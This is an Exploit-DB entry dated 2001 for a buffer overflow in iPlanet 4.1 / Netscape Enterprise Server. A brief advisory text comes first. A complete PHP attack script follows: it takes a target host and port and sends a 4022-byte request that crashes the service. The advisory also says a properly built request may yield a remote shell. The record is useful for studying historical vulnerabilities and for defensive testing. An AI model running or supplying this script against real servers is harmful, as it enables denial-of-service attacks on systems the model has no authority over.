iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)

EDB-ID:

20853




Platform:

Multiple

Date:

2001-05-15


source: https://www.securityfocus.com/bid/2732/info
 
iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance.
 
By sending a specially crafted request (composed of at least 2000 characters) it is possible to cause a buffer overflow. This could cause the termination of the affected service, requiring a restart and enabling a remote attacker to effect a denial of service attack.
 
If the submitted buffer is properly structured, it may yield a remote system shell.
 
Successful exploitation of this vulnerability could lead to a complete compromise of the host.
 
Note that while only installations of iWS4.1sp3-7 on Windows NT are immediately vulnerable to this attack, all users of iWS4.1sp3-7 are advised to install the NSAPI. 

#!/usr/local/bin/php -q
<?
/*
 * Netscape Enterprise Server 4 Method and URI overflow 
 *
 * By sending an invalid method or URI request of 4022 bytes Netscape 
 * Enterprise Server will 
 * stop responding to requests. 
 *
 * Written by Gabriel Maggiotti
 */

	if( $argc!=3)
	{
	echo "usagge: $argv[0] <host> <port>\n";
	return 1;
	}


$host=$argv[1];
$port=$argv[2];

	for($i=0;$i<4022;$i++)
		$overflow.="A";
	
$overflow.=" /index.htm HTTP/1.0\n\n";

$fp = fsockopen ($host, $port , &$errno, &$errstr, 30);
 if (!$fp) {
     echo "Couldn't create connection<br>\n";
 } else {
	fputs ($fp, $overflow);
}
fclose ($fp);

?>